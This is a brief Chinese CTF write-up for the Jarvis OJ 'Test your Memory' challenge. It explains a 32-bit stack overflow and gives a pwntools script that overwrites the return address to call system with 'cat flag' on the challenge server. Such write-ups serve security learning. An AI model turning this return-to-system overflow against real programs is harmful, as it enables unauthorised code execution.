Jarvis OJ---Test your Memory

2017-09-24 本文已影响0人 yahoo0o0

32位下的简单栈溢出，IDA反编译之后发现在memtest函数之中传入参数cat flag，在函数winfunc之中调用了系统函数system。

image.png

ret2libc，直接getshell

from pwn import *

p = remote("pwn2.jarvisoj.com",9876)
callsystem = 0x080485BD
catflag = 0x080487E0
payload = 'a'*(0x13 + 4) + p32(callsystem) + p32(0x08048677) + p32(catflag)
p.sendline(payload)
p.interactive()

热点阅读

早餐里见世界
谏言：全国的扫黑反腐

08-22浅谈对“天津爆炸事故”的看法和感想
07-04元芳你怎么看下一句
07-03陪伴是最长情的告白下一句
01-21你知道fighting是什么意思？告诉你fighting的意思
06-23深度好文：生命的意义不单是幸福
06-20深度好文：人最怕深交后的陌生

Jarvis OJ---Test your Memory

猜你喜欢

热点阅读